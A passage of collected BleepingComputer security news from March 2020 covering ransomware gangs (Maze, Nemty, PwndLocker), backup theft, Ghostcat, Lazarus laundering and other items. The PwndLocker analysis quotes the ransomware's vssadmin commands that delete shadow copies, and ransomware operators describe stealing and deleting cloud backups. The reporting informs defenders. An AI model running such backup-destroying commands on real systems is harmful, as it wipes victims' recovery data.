Log in to Veeam using Windows authentication
Once they gain access, the Maze Ransomware operators told BleepingComputer that if cloud backups are configured, it is very useful when stealing data from their victims. Configured cloud provider
Configured cloud provider
When Maze finds backups stored in the cloud, they attempt to obtain the cloud storage credentials and then use them to restore the victim's data to servers under the attacker's control.

"Yes, we download them. It is very useful. No need to search for sensitive information, it is definitely contained in backups. If backups in the cloud it is even easier, you just login to cloud and download it from your server, full invisibility to "data breach detection software". Clouds is about security, right?"

As the attackers are restoring directly from the cloud to their servers, it won't raise any red flags for the victim as their servers appear to be operating normally with no logs being created in their backup software.

The Maze operators did not elaborate on how they gain access to the cloud credentials, but DoppelPaymer told us they use "all possible methods".

This could include keyloggers, phishing attacks, or by reading locally saved documentation on the backup servers.

Deleting backups before ransomware attacks
Regardless of whether the backups are used to steal data, before encrypting devices on the network the attackers will first delete the backups so that they cannot be used to restore encrypted files.

DoppelPaymer told BleepingComputer that even though cloud backups can be a good option to protect against ransomware, it is not 100% effective.

"Cloud backups are a very good option against ransom but do not 100% protect as cloud backups are not always good configured, offline backups often outdated - the system of backups is really nice but human factor leaves some options," DoppelPaymer told us via email.

Unless you subscribe to service add-ons such as immutable backups, as the actors have full access to the local install of backup software, they can simply delete any backups that exist in the cloud.

Deleting a cloud backup in Veeam
Deleting a cloud backup in Veeam
With a victim's data now stolen and their backups deleted, the attackers deploy their ransomware throughout the compromised network using PSExec or PowerShell Empire typically during off-hours.

This usually leads to a company opening the next day to an encrypted network.

Protecting your backups
In emails with Rick Vanover, Senior Director, Product Strategy at Veeam Software, we were told that it does not matter what software you use, once an attacker gains privileged access to the network, everything is at risk.

"We have advocated, even in a published 2017 whitepaper that I wrote I’ve recommended separate accounts for Veeam installations and components. Additionally, I recommend Veeam installations to use non-domain accounts for components as well to add more account-based layers of resiliency. Additionally, Veeam has recommended that the Veeam deployment not have Internet access or otherwise be on an isolated management network," Vanover told BleepingComputer.

To prevent ransomware attackers from gaining complete leverage over a victim, Veeam recommends that companies follow a 3-2-1 Rule when configuring backups.

"Whether it is ultra-resilient backup data like S3-immutable backups in the cloud, encrypted backups on tape or encrypted backups on removable offline storage; customers need to have multiple copies of data. We have advocated for a long time the 3-2-1 Rule, which advocates having 3 different copies of data on 2 different media with one of them being off-site. Couple in 1 copy being on an ultra-resilient technique such as an immutable backup, offline backup or otherwise air-gapped; data can be protected against nearly any failure scenario – including ransomware. Additionally, Veeam also has a technology called Secure Restore; which will perform a threat scan with almost any tool to ensure that a restored system or data does not re-introduce a threat," Vanover continued.

Like Veeam, Nero Consulting also strongly recommends users should purchase the immutable storage or redundant storage protection options if available when using cloud services.

Using this option, even if the data is deleted from the cloud storage provider, the immutable storage service will make the data recoverable for a certain amount of time.

As for protecting a network from data exfiltration, the best solution is to prevent the attackers from gaining access to your network in the first place and to monitor for suspicious activity.

This would include utilizing network monitoring software, intrusion detection systems, and geographic and IP access control for cloud storage providers if available.


Microsoft Releases March 2020 Office Updates With Fixes, Improvements
7.3.2020 
Bleepingcomputer   Vulnerebility

Microsoft released the March 2020 non-security Microsoft Office updates with improvements and fixes for the Windows Installer (MSI) editions of Office 2013 and Office 2016.

For instance, this month's updates fix a Microsoft Office 2016 error caused by ADODB.Recordset objects, updates some translations, and an issue affecting Skype for Business users that will not let them stop HID devices from ringing if certain conditions are met.

Today's Office updates are available for download via Microsoft's Update service or from the Download Center for manual installation.

Depending on the update you want to install, you might also be required to have previous updates such as a Service Pack installed on their devices, as is the case of the Microsoft Office 2013 update that requires the Microsoft Office 2013 Service Pack 1.

March 2020 Office non-security updates
Some of the Office March non-security updates listed below only apply to certain programs like Skype for Business. Other updates are designed to add improvements or fix issues affecting the entire suite of Microsoft Office 2016 apps.

Additionally, these non-security Microsoft Office updates do not apply to the Click-to-Run versions of the Office apps, like Microsoft Office 365 Home.

The list of updates and the Office product they apply to is available below.

Office 2016
Product Knowledge Base article
Microsoft Office 2016 KB4484247
Microsoft Office 2016 Language Interface Pack KB4484136
Skype for Business 2016 KB4484245
Office 2013
Product Knowledge Base article
Skype for Business 2015 KB4484097
Some Office updates require a system reboot
Before installing the March 2020 non-security Microsoft Office updates, it's important to mention that a computer restart might also be needed to complete the update's installation process.

If your Office installation starts misbehaving, you can remove the offending update using these steps:

Go to Start, enter View Installed Updates in the Search Windows box, and then press Enter.
In the list of updates, locate and select the offending update, and then select Uninstall.


UK NCSC Releases Tips on Securing Smart Security Cameras
7.3.2020 
Bleepingcomputer   BigBrothers

The UK National Cyber Security Centre (NCSC) has released guidance on how to correctly set up smart security cameras and baby monitors to avoid having them hacked by attackers.

This new guidance was released because so-called smart security cameras and baby monitors can put your security and privacy at risk if not configured properly.

Such devices make it possible to watch a live camera feed over the Internet, receive activity alerts when you're not around the house, and even record surveillance footage for reviewing later in case of any incidents.

By taking the steps detailed by the NCSC, users of such devices can avoid being the victim of threat actors looking to compromise them.

Change your devices' default passwords
"Smart cameras (the security cameras and baby monitors used to monitor activity in and around your house) usually connect to the internet using your home Wi-Fi," the NCSC says. "Live feeds or images from smart cameras can (in rare cases) be accessed by unauthorized users, putting your privacy at risk," the NCSC adds.

"This is possible because smart cameras are often configured so that you can access them whilst you're away from home."

The most important measure you can take to secure your smart security cameras is to change your devices' default passwords to prevent cybercriminals from gaining access via built-in default passwords seeing that many of them come with easy to guess

If not changed, criminals could access a smart security camera or a baby monitor remotely after guessing the default password and watch you or your kid via live video.

To defend against such an attack, the NCSC recommends changing the default password your device ships with a strong passphrase-based password built using three random words you would easily remember.

The FBI also recommends using passphrases that combine several words to obtain long and easy to remember passwords that are also harder to crack by an attacker.

Keep security cameras up to date, disable unneeded remote view
The NCSC also advises security camera users to always update their software and, if such an option is available, to enable automatic software updates.

This would allow keeping the devices up to date at all times while not having to worry about looking for new software releases manually.

"Using the latest software will not only improve your security, it often adds new features," the NCSC says. "Note that the software that runs your camera is sometimes referred to as firmware, so look for the words update, firmware or software within the app.

The new guidance also recommends disabling Internet access to the smart security camera if you don't use the feature allowing for viewing camera footage remotely.

"Note that doing this may also prevent you receiving alerts when movement is detected, and could stop the camera working with smart home devices (such as Alexa, Google Home or Siri)," the NCSC adds.

UK government plans to strengthen IoT security
This guidance was released following UK government plans for strengthening the security of internet-connected products that were outlined during late-January.

The new law aims to impose the following requirements from manufacturers of Internet-enabled IoT devices:

• All consumer internet-connected device passwords must be unique and not resettable to any universal factory setting
• Manufacturers of consumer IoT devices must provide a public point of contact so anyone can report a vulnerability and it will be acted on in a timely manner
• Manufacturers of consumer IoT devices must explicitly state the minimum length of time for which the device will receive security updates at the point of sale, either in store or online
In related news, Ring announced the roll-out of mandatory two-factor authentication (2FA) to all user accounts to boost security cameras' security, after a stream of incidents where attackers terrified homeowners and their children by speaking to them over their Ring devices' speakers following a series of credential stuffing attacks targeting Ring cameras.


German BSI Tells Local Govt Authorities Not to Pay Ransoms
7.3.2020 
Bleepingcomputer   BigBrothers

BSI, Germany's federal cybersecurity agency, recommends local governments and municipal institutions not to pay the ransoms asked by attackers after they get affected by ransomware attacks.

Germany's Federal Office for Information Security (aka BSI, short for Bundesamt für Sicherheit in der Informationstechnik) in collaboration with the Federal Criminal Police Office (BKA) also issued recommendations for local authorities on how to deal with ransom demands following an increasing number of such attacks.

Local authorities advised not to respond to extortionists
The presidents of the German City Council, the German District Council, and the German Association of Cities and Municipalities also issued a joint statement in support of BSI's recommendation.

"We must not give in to such ransom demands. It must be clear that municipal administrations cannot be blackmailed," they said. "Otherwise, criminals will be offered incentives to continue their actions. The attitude of our administrations must be crystal-clear and non-negotiable."

"Every attempt to extortion must be consistently reported and followed up. A zero-tolerance policy must apply to such attacks on the functionality of municipal services, the data of citizens and their tax money."

BKA President Holger Münch also said that local authorities impacted by ransomware attacks should never respond to ransom requests to avoid supporting the extortionists' 'business model'.

Münch recommended taking precautions for timely systematic prevention, detection, and response to such attacks and to report any ransomware-related incidents to the appropriate authorities.

"The best protection against ransom demands from cybercriminals is consistently implemented IT security measures," BSI President Arne Schönbohm added. "Effective emergency management can decisively minimize the effects of a cyber attack. The BSI is also happy to provide municipalities with advice."

The BSI provides government agencies and privately-held organizations with detailed guidance on how to defend against and respond to ransomware attacks, as well as first aid info in the event of serious IT security incidents.

Previous recommendations not to pay ransoms
In October 2019, the FBI Internet Crime Complaint Center (IC3) also issued a public service announcement targeted at public and private U.S. organizations about the increasing number of high-impact ransomware attacks.

"Since early 2018, the incidence of broad, indiscriminant ransomware campaigns has sharply declined, but the losses from ransomware attacks have increased significantly, according to complaints received by IC3 and FBI case information," the IC3 said at the time.

"Although state and local governments have been particularly visible targets for ransomware attacks, ransomware actors have also targeted health care organizations, industrial companies, and the transportation sector."

The FBI urged both individuals or organizations that had their systems encrypted by ransomware not to pay the ransoms requested by the extortionists behind the attacks and, instead, to contact the FBI's field offices and report the attacks to IC3 as soon as possible.

The agency advised U.S. organizations targeted by a heavy barrage of ransomware attacks to take the following defensive measures:

• Regularly back up data and verify its integrity
• Focus on awareness and training
• Patch the operating system, software, and firmware on devices
• Enable anti-malware auto-update and perform regular scans
• Implement the least privilege for file, directory, and network share permissions
• Disable macro scripts from Office files transmitted via email
• Implement software restriction policies and controls
• Employ best practices for use of RDP
• Implement application whitelisting
• Implement physical and logical separation of networks and data for different org units
• Require user interaction for end-user apps communicating with uncategorized online assets
Prevention is the new target
Taking measures to block ransomware operators from infiltrating their networks is even more important now that harvesting victims' data before encrypting systems has surfaced as the latest extortion method.

Once the data gets stolen, the ransomware gangs will start threatening to leak out the stolen data in small batches as leverage to pressure their victims to give in and paying the ransoms.

This trend was initially started by Maze Ransomware in November 2019 and it was later adopted by operators of other ransomware families such as Sodinokibi, Nemty Ransomware, and BitPyLock.

Sodinokibi (aka REvil) also shared plans to email stock exchanges like NASDAQ as a hit to the stock valuation of traded companies they compromise.

"Ransomware is not about encrypting data. It is the _current_ implementation of a methodology that coerces the victim to act as an agent for the criminal (typically to acquire BTC)," as security researcher thegrugq said three years ago. "Encrypting data just an implementation detail; it’s the 'coerced agent' part that matters."

RailWorks Corporation, one of North America’s leading railroad track providers, was the first to disclose a data breach following a ransomware attack last week showing that ransomware attacks should now also be considered data breaches, with all that it entails, including potential fines.


Chinese Security Firm Says CIA Hackers Attacked China Since 2008
7.3.2020 
Bleepingcomputer   BigBrothers

Chinese security vendor Qihoo 360 says that the US Central Intelligence Agency (CIA) has hacked Chinese organizations for the last 11 years, targeting various industry sectors and government agencies.

Qihoo 360 claims in the report that lacks any technical details that "the CIA hacking group (APT-C-39)" has targeted a multitude of Chinese companies between September 2008 and June 2019, with a focus on "aviation organizations, scientific research institutions, petroleum industry, Internet companies, and government agencies."

"We speculate that in the past eleven years of infiltration attacks, CIA may have already grasped the most classified business information of China, even of many other countries in the world," Qihoo 360's report says.

"It does not even rule out the possibility that now CIA is able to track down the real-time global flight status, passenger information, trade freight and other related information.

"If the guess is true, what unexpected things will CIA do if it has such confidential and important information? Get important figures‘ travel itinerary, and then pose political threats, or military suppression?"

Targeted Chinese areas
Targeted Chinese areas
APT-C-39 used CIA and NSA attack tools
The Chinese security firm also says that its researchers connected the APT-C-39 hacking campaigns to the CIA based on malware used during the attacks spanning over 11 years, including the Fluxwire backdoor and the Grasshopper malware builder.

Documentation info on these tools was leaked by WikiLeaks in March 2017, with the leak site saying at the time it also had "the majority of its [CIA's] hacking arsenal including malware, viruses, trojans, weaponized 'zero day' exploits, malware remote control systems and associated documentation."

Qihoo 360 found that "the technical details of most samples of the APT-C-39 are consistent with the ones described in the Vault 7 documents" and that "before the Vault 7 cyber weapon was disclosed by WikiLeaks, the APT-C-39 already used relevant cyber weapons against targets in China."

Additionally, the Chinese security outfit claims that the APT-C-39 hacking campaigns also used tools connected with the US National Security Agency (NSA). The Chinese researchers were able to detect the WISTFULTOOL data exfiltration plugin used "in an attack against a large Internet company in China in 2011."

APT-C-39 group's weapons compilation time also locates the hacking group within the U.S. time zone per Qihoo 360 seeing that "yhe compilation time of the captured samples is in line with the North American business working hours."

APT-C-39  compilation times

CIA hackers also tracked by other security firms
Qihoo 360 is not the only security vendor tracking CIA hacking campaigns, with Kaspersky and Symantec also having previously labeled them as Lamberts and Longhorn, respectively.

While Kaspersky researchers have been monitoring CIA hacking activities since 2008 (matching Qihoo 360's claims), Symantec's monitoring data goes back to at least 2011 and highlighting 40 compromised targets from roughly 16 countries, across various industry sectors in across the Middle East, Europe, Asia, and Africa.

The CIA hackers were also mentioned as the ones behind attacks on domestic Chinese aviation companies from late-2018 by the Chinese cybersecurity group Qi-Anxin in a report from September 2019 as reported by ZDNet.

Qi-Anxin's researchers, just like their Qihoo 360 counterparts, made the connection to the CIA hacking groups after spotting the Fluxwire backdoor being used during the attack.

Qihoo 360's report was published after two Chinese nationals were charged yesterday by the US Dept of Justice and sanctioned by the US Treasury for allegedly laundering over $100 million worth of cryptocurrency for North Korean actors known as Lazarus Group.


SETI@home Search for Alien Life Project Shuts Down After 21 Years
7.3.2020 
Bleepingcomputer   IT

SETI@home has announced that they will no longer be distributing new work to clients starting on March 31st as they have enough data and want to focus on completing their back-end analysis of the data.

SETI@home is a distributed computing project where volunteers contribute their CPU resources to analyze radio data from the Arecibo radio telescope in Puerto Rico and the Green Bank Telescope in West Virginia for signs of extraterrestrial intelligence (SETI).

Run by the Berkeley SETI Research Center since 1999, SETI@home has been a popular project where people from all over the world have been donating their CPU resources to process small chunks of data, or "jobs", for interesting radio transmissions or anomalies. This data is then sent back to the researchers for analysis.

SETI@home
SETI@home
In an announcement posted yesterday, the project stated that they will no longer send data to SETI@home clients starting on March 31st, 2020 as they have reached a "point of diminishing returns" and have analyzed all the data that they need for now.

Instead, they want to focus on analyzing the back-end results in order to publish a scientific paper.

"It's a lot of work for us to manage the distributed processing of data. We need to focus on completing the back-end analysis of the results we already have, and writing this up in a scientific journal paper," their news announcement stated.

Users who wish to continue to run the SETI@home client may do so, but will not receive any new work until the project decides whether they wish to start sending work to clients again.

For those who wish to donate their CPU resources, SETI@home suggests users select another BOINC project that also supports distributed computing.


Cisco Offering Free 90-day Webex Licenses Due to Coronavirus
7.3.2020 
Bleepingcomputer   IT

To make it easier for those who are impacted by the spread of Coronavirus/COVID-19, Cisco has enhanced its free Webex account offerings and offering free 90-day business licenses.

To prevent the potential of community spread of the Coronavirus inside and outside of the workplace, some companies are requiring employees to work remotely after international travel.

Other companies, such as Twitter are asking employees to work remotely if possible even if they are not in areas currently impacted by the virus.

"Beginning today, we are strongly encouraging all employees globally to work from home if they’re able. Our goal is to lower the probability of the spread of the COVID-19 coronavirus for us - and the world around us. We are operating out of an abundance of caution and the utmost dedication to keeping our Tweeps healthy," Twitter stated in a blog post.

To aid those impacted by Coronavirus, Cisco has enhanced its free Webex accounts to have additional features that make it easier to work from home.

Previously, free Cisco Webex accounts allow you to host meetings with up to 50 participants for 40 minutes.

With the new offering, free accounts can now host meetings with up to 100 participants and for an unlimited amount of time. They are also offering toll dial-in numbers in addition to their normal VoIP capabilities.

"Effective immediately, we've expanded the capabilities on our free Webex offer in all countries where it is available, not only those impacted by COVID-19," Cisco stated in a new support article.

For businesses, Cisco is also offering free 90-day licenses through partners and the Cisco sales team.

"Additionally, through our partners and the Cisco sales team, we are providing free 90-day licenses to businesses who are not Webex customers in this time of need. We’re also helping existing customers meet their rapidly changing needs as they enable a much larger number of remote workers by expanding their usage at no additional cost."

These free Webex accounts are available in the following countries:

Australia, Austria, Belgium, Brazil, Bulgaria, Canada, Croatia, Cyprus, Czech Republic, Denmark, Estonia, Finland, France, Germany, Gibraltar, Greece, Hong Kong, Hungary, India, Indonesia, Ireland, Israel, Italy, Japan, Latvia, Lithuania, Luxembourg, Macau, Malaysia, Malta, Mexico, Netherlands, New Zealand, Norway, Poland, Portugal, Romania, Singapore, Slovakia, Slovenia, South Africa, South Korea, Spain, Sweden, Switzerland, Taiwan, Thailand, UAE (United Arab Emirates), Ukraine, United Kingdom, United States, and Vietnam.

For those who want to take advantage of this offer, you can sign up for your free Webex account here.


Nemty Ransomware Punishes Victims by Posting Their Stolen Data
7.3.2020 
Bleepingcomputer   Ransomware

The Nemty Ransomware is the latest cybercrime operation to create a data leak site to punish victims who refuse to pay ransoms.

In 2019, ransomware operators began to use the concerning tactic of stealing victim's files before encrypting computers and then publicly posting these files if the victim does not pay.

The stealing and publishing of stolen data, which in many cases includes company financials, personal information of employees, and client data, automatically escalated these ransomware attacks into data breaches.

Once Maze Ransomware followed through with their threat and posted stolen files, other ransomware families such as DoppelPaymer and Sodinokibi started to launch leak sites to extort victims in a similar manner.

In a new site shared with BleepingComputer by Damien, the Nemty Ransomware operators have started to punish their non-paying victims by releasing files that were stolen before devices were encrypted.

Nemty Leak Site
Nemty Leak Site
This blog currently lists a single victim, an American footwear company, and contains a link to 3.5 Gigabytes of files that were allegedly stolen from the company.

As more ransomware operators begin to utilize this extortion tactic, victims will need to consider all ransomware attacks a data breach. This means file noticed with the government, alerting affected people, and sending out breach notifications.

The attackers are hoping that these extra costs and the potential reputation hit may push some victims into paying a ransom.

BleepingComputer has contacted the listed company to confirm if this is indeed their data but had not heard back at this time.


US Charges Two With Laundering $100M for North Korean Hackers
7.3.2020 
Bleepingcomputer   BigBrothers

Two Chinese nationals were charged today by the US Dept of Justice and sanctioned by the US Treasury for allegedly laundering over $100 million worth of cryptocurrency out of the nearly $250 million stolen by North Korean actors known as Lazarus Group after hacking a cryptocurrency exchange in 2018.

According to a Department of Justice (DoJ) press release, 田寅寅 aka Tian Yinyin, and 李家东aka Li Jiadong, were charged with operating an unlicensed money transmitting business and money laundering conspiracy.

$300 million worth of crypto stolen by Lazarus Group
The almost $250 million worth of virtual currency their North Korean co-conspirators were able to steal after hacking into an unnamed virtual currency exchange was "laundered through hundreds of automated cryptocurrency transactions aimed at preventing law enforcement from tracing the funds."

"In April 2018, an employee of the exchange unwittingly downloaded DPRK-attributed malware through an email, which gave malicious cyber actors remote access to the exchange and unauthorized access to customers’ personal information, such as private keys used to access virtual currency wallets stored on the exchange’s servers," the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) explained.

"Lazarus Group cyber actors used the private keys to steal virtual currencies ($250 million dollar equivalent at date of theft) from this exchange, accounting for nearly half of the DPRK’s estimated virtual currency heists that year."

The North Korean hackers are also tied to the theft of another roughly $48.5 million worth of cryptocurrency from a South Korea-based exchange in November 2019.

In April 2018, the Lazarus Group leveraged previously used malware code from the now-defunct cryptocurrency application Celas Trade Pro — software both developed and offered by the Lazarus Group registered website called Celas Limited. Creating illegitimate websites and malicious software to conduct phishing attacks against the virtual currency sector is a pattern previously seen from North Korean cybercriminals. - OFAC

Crypto converted into Chinese yuan and Apple gift cards
Tian and Li received $91 million from DPRK-controlled accounts as the first batch of currency to launder in April 2018 and an additional $9.5 million after the Lazarus Group actors hacked a second exchange. The defendants then transferred these funds among virtual currency addresses they controlled to obfuscate their origin.

From December 2017 up until around April 2019, Tian and Li have purportedly laundered more than $100 million worth of cryptocurrency, primarily sourced from Lazarus Group's virtual currency exchange hacks.

Flow of laundered cryptocurrency funds
Flow of laundered cryptocurrency funds
"The civil forfeiture complaint specifically names 113 virtual currency accounts and addresses that were used by the defendants and unnamed co-conspirators to launder funds," the DoJ added. "The forfeiture complaint seeks to recover the funds, a portion of which has already been seized."

"The two defendants operated through independent as well as linked accounts and provided virtual currency transmission services for a fee for customers," the OFAC added. "As a result of today’s action, all property and interests in property of these individuals that are in the United States or in the possession or control of U.S. persons must be blocked and reported to OFAC."

"The August 2019 UN Security Council 1718 Committee Panel of Experts report estimates that North Korea had attempted to steal as much as $2 billion, of which $571 million is attributed to cryptocurrency theft. This revenue allows the North Korean regime to continue to invest in its illicit ballistic missile and nuclear programs."

While the DoJ and OPAC haven't named the two hacked crypto exchanges, the two press releases hint at potential connections to Lazarus Group campaigns detected and reported by Kaspersky in 2018 and 2020.


Microsoft MVP Summit Now A Virtual Conf Over Coronavirus Fears
7.3.2020 
Bleepingcomputer   Security

Microsoft has decided to change its annual in-person MVP Summit held in Seattle, Washington into a virtual online conference over concerns about the continuing spread of the Coronavirus outbreak.

Every year Microsoft invites the members of their Microsoft MVP program to an MVP Summit in Seattle where members can meet their peers, interact with employees, and take part in sessions about Microsoft products.

For those who are active members of the Microsoft MVP community, the Summit is something to be looked forward to and a lot of fun for the attendees.

Scheduled for March 16th through the 20th, this year's in-person MVP Summit has been canceled over concerns about the Coronavirus and being turned into a virtual online conference.

"In light of recent developments globally and the growing concerns around the spread of the COVID-19 virus, Microsoft has decided that this year’s MVP/ Regional Director Summit will be an online-only / virtual event. It will be scheduled for the same week (Mar 16-20)," an email sent to Microsoft MVPs stated.

For those who have registered, Microsoft will be providing further updates soon.


Windows 10 Y3K Bug: Won't Install After January 18, 3001
7.3.2020 
Bleepingcomputer   OS

A bizarre bug could affect some Windows 10 users that try to install the latest Windows release on computers where the BIOS date is set to January 19, 3001, or later on AMD or Intel motherboards.

"It seems if your motherboard BIOS (AMD or Intel) allows you to set a date of 1-19-3001 or beyond, Windows 10 1909 will not finish installing, but locks up during the second reboot of the installation process," as Carey Holzman, an IT professional and YouTuber focusing on computer enthusiasts, told BleepingComputer.

"Furthermore, if the BIOS date is changed, and you restart the computer in an attempt to complete the install of Windows 10, guess what happens next?"

"Windows 10 freezes again and when you check your BIOS date, you’ll find Windows 10 automatically puts the incorrect BIOS date back in your BIOS! If you change the motherboard, then attempt to restart from the failed install, the install will once again freeze and set the incorrect installation date back into the new motherboards BIOS!"

The bug will not go away whatever changes you make to the system's hardware specs as long as you will try to boot off of the hard drive you initially attempted to install Windows 10, version 1909 on.

This issue affects at least the users of Gigabyte H370 HD3 (for Intel CPUs) and Gigabyte x570 Aorus Elite (for AMD CPUs) motherboards since these two were used by our reader during his tests.

How to fix the 'Windows 10 Y3K Bug'
The solution to this conundrum is to:

1. FIX the BIOS date FIRST.
2. Restart the PC from the Windows 10 installation media (USB flash drive or DVD).
3. Clear ALL drive partitions on the SSD/HDD you want to install Windows 10 on and ONLY THEN start the installation process again.
As long as you make sure that the BIOS date on your motherboard is set to January 18, 3001, or earlier, the Windows 10 1909 will go ahead without any issues.

For this to happen the motherboard vendor has to fail to enforce date rules: in our reader's case, although Gigabyte says that the maximum date is 2099, users can freely change it on their own with this unexpected result.

Microsoft's Windows 10 also has to fail to check if all system requirements including the BIOS date are met before starting the installation process.

Weird Windows 10 issue that most won't ever encounter
While this a bizarre Windows 10 bug that no one would normally encounter or care about, it only takes one lucky person who buys an 'open box' motherboard from an online retailer with the wrong BIOS date set by a time traveler.

If they don't know about this issue and set a supported BIOS date, they'll most probably keep rebooting and attempting to change system hardware in the eventuality that one of them is failing.

Those who are more technically inclined might actually attempt to wipe their hard drive or even clean install Windows 10 to make sure that the installation process hasn't failed in any way. It won't work though unless both these two measures are taken.

All in all, even though this issue is as exotic as they come, when an operating system is used by hundreds of millions of customers it's bound for some of its users to encounter it in the end. Case in point, our reader who tipped us on this weird bug.

BIOS date range on Gigabyte MB
BIOS date range on Gigabyte MB (Carey Holzman)
"I think Gigabyte needs to fix the BIOS on every current motherboard they sell and Microsoft needs to add a reasonable date check during the initial install process," Holzman told BleepingComputer.

To be fair, messing with the system date and especially with the one in your computer's BIOS is known to cause all sorts of issues and unusual behaviors from software not working properly to websites not loading because of 'expired' site certificates. And now, failed operating system installation attempts.

The lesson of the day? Don't touch the date, BIOS or system, if you don't want weird things happening.

When BleepingComputer contacted Microsoft about this bug, we were told that they had nothing to share.

A video demo of this issue is embedded below.
 


New PwndLocker Ransomware Targeting U.S. Cities, Enterprises
7.3.2020 
Bleepingcomputer    Ransomware

Driven by the temptation of big ransom payments, a new ransomware called PwndLocker has started targeting the networks of businesses and local governments with ransom demands over $650,000.

This new ransomware began operating in late 2019 and has since encrypted a stream of victims ranging from local cities to organizations.

BleepingComputer has been told that the ransom amounts being demanded by PwndLocker range from $175,000 to over $660,000 depending on the size of the network.

It is not known if any of these victims have paid at this time.

PwndLocker says they encrypted Lasalle County's network
A source recently told BleepingComputer that the ransomware attack against Lasalle County in Illinois was conducted by the operators of the PwndLocker Ransomware.

When asked by BleepingComputer, the ransomware operators said they are behind the attack and are demanding a 50 bitcoin ransom ($442,000) for a decryptor.

The attackers have also told BleepingComputer that they have stolen data from the county before encrypting the network. From an image and a list of folders shared with BleepingComputer by the attackers, it does look like files were stolen from the county.

Local media reports that Lasalle County has no plans on paying the ransom.

BleepingComputer has contacted Lasalle County via email for confirmation but the emails were rejected. We have also left a voicemail but have not heard back at this time.

Update 3/3/2020 8:19 AM: PwndLocker has also encrypted the network for the City of Novi Sad in Serbia.
Update 3/3/2020 7:18 PM: PwndLocker shared an image and a list of folders that they say were stolen from Lasalle County.

The PwndLocker Ransomware
In a sample shared with BleepingComputer by MalwareHunterTeam, when executed PwndLocker will attempt to disable a variety of Windows services using the 'net stop' command so that their data can be encrypted.

Some of the applications whose services are targeted include Veeam, Microsoft SQL Server, MySQL, Exchange, Acronis, Zoolz, Backup Exec, Oracle, Internet Information Server (IIS), and security software such as Kaspersky, Malwarebytes, Sophos, and McAfee.

The ransomware will also target various processes and terminate them if detected. Some of the processes targeted include Firefox, Word, Excel, Access, and other processes related to security software, backup applications, and database servers.

PwndLocker will now clear the Shadow Volume Copies so that they cannot be used to recover files with the following commands:

vssadmin.exe delete shadows /all /quiet
vssadmin.exe resize shadowstorage /for=D: /on=D: /maxsize=401MB
vssadmin.exe resize shadowstorage /for=D: /on=D: /maxsize=unbounded
Once the system has been prepped for encryption, PwndLocker will begin to encrypt the computer.

While encrypting files, it will skip any files that contain one of the following extensions.

.exe, .dll, .lnk, .ico, .ini, .msi, .chm, .sys, .hlf, .lng, .inf, .ttf, .cmd, .bat, .vhd, .bac, .bak, .wbc, .bkf, .set, .win, .dsk
The ransomware will also skip all files located in the following folders:

$Recycle.Bin
Windows
System Volume Information
PerfLogs
Common Files
DVD Maker
Internet Explorer
Kaspersky Lab
Kaspersky Lab Setup Files
WindowsPowerShell
Microsoft
Microsoft.NET
Mozilla Firefox
MSBuild
Windows Defender
Windows Mail
Windows Media Player
Windows NT
Windows Photo Viewer
Windows Portable Devices
Windows Sidebar
WindowsApps
All Users
Uninstall Information
Microsoft
Adobe
Microsoft
Microsoft_Corporation
Packages
Temp
When encrypting files, MalwareHunterTeam has seen it using the .key and .pwnd extensions depending on the victim. The sample BleepingComputer analyzed uses the .key extension as shown below.

Files encrypted by PwndLocker
Files encrypted by PwndLocker
When done encrypting, ransom notes named H0w_T0_Rec0very_Files.txt will be located throughout the computer and on the Windows desktop.

These ransom notes will contain an email address and Tor payment site that can be used to get payment instructions and the ransom amount.

PwndLocker Ransom Note
PwndLocker Ransom Note
The PwndLocker Payment Site allows victims to decrypt two files for free, talk to the ransomware operators and contains the ransom amount in bitcoins.

PwndLocker Tor Payment Site
PwndLocker Tor Payment Site
It is not known at this time if there are any weaknesses in the encryption algorithm.


Active Scans for Apache Tomcat Ghostcat Vulnerability Detected, Patch Now
7.3.2020 
Bleepingcomputer   Vulnerebility

Ongoing scans for Apache Tomcat servers unpatched against the Ghostcat vulnerability that allows potential attackers to take over servers have been detected over the weekend.

As cyber threat intelligence firm Bad Packets said on Saturday, "mass scanning activity targeting this vulnerability has already begun. PATCH NOW!"

Ghostcat is a high-risk file read/include vulnerability tracked as CVE-2020-1938 and present in the Apache JServ Protocol (AJP) of Apache Tomcat between versions 6.x and 9.x.

The Apache Tomcat developers have released versions 7.0.100, 8.5.51, and 9.0.31 to patch the vulnerability, however, users of version 6.x will have to upgrade to a newer version since this branch has already reached end-of-support and is no longer updated — the last update for 6.x was released on April 7, 2017.

All unpatched Apache Tomcat 6, 7, 8, and 9 installations ship with AJP Connector enabled by default and listening on all configured server IP addresses on port 8009.

Proof-of-concept exploits available
Tenable says that proof-of-concept exploits have already been shared by security researchers on GitHub (1, 2, 3, 4, 5).

If you can't immediately update or upgrade your server to a patched Tomcat version, Chaitin Tech's research team recommends disabling the AJP Connector altogether if not actively used or configure the requiredSecret attribute for the AJP Connector to set authentication credentials.

Chaitin Tech also provides a security assessment tool that will help you discover Tomcat servers vulnerable to attacks targeting Ghostcat on your network.

Detecting Tomcat servers exposed to Ghostcat attacks
Detecting Tomcat servers exposed to Ghostcat attacks (Chaitin Tech​​​​​​)
According to Shodan more than 890,000 Tomcat servers currently reachable over the Internet, while BinaryEdge found over 1 million.

The affected Apache Tomcat versions and the ones were the Ghostcat vulnerability has been patched are listed in the table below.

Version Impacted versions Fixed version
Apache Tomcat 9 Up to 9.0.30 9.0.31
Apache Tomcat 8 Up to 8.5.50 8.5.51
Apache Tomcat 7 Up to 7.0.99 7.0.100
Apache Tomcat 6 ALL VERSIONS N/A
Critical flaw that can lead to server takeover
"Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection," the developers explain. "If such connections are available to an attacker, they can be exploited in ways that may be surprising."

As researchers at Chinese security outfit Chaitin Tech who discovered the bug detailed, after successfully exploiting an unpatched Tomcat server "an attacker can read the contents of configuration files and source code files of all webapps deployed on Tomcat."

"In addition, if the website application allows users upload file, an attacker can first upload a file containing malicious JSP script code to the server (the uploaded file itself can be any type of file, such as pictures, plain text files etc.), and then include the uploaded file by exploiting the Ghostcat vulnerability, which finally can result in remote code execution."

According to Snyk and Red Hat, Tomcat also ships with apps built using the Spring Boot Java framework, as well as other Java-based servers and frameworks including but not limited to JBoss Web Server (JWS) and JBoss Enterprise Application Platform (EAP) as ZDNet reported.


US Drugstore Giant Walgreens Leaked Users' Sensitive Info
7.3.2020 
Bleepingcomputer   Incindent

US drugstore chain giant Walgreens disclosed over the weekend that some of its mobile apps' users have been able to inadvertently access other users' sensitive information because of a bug.

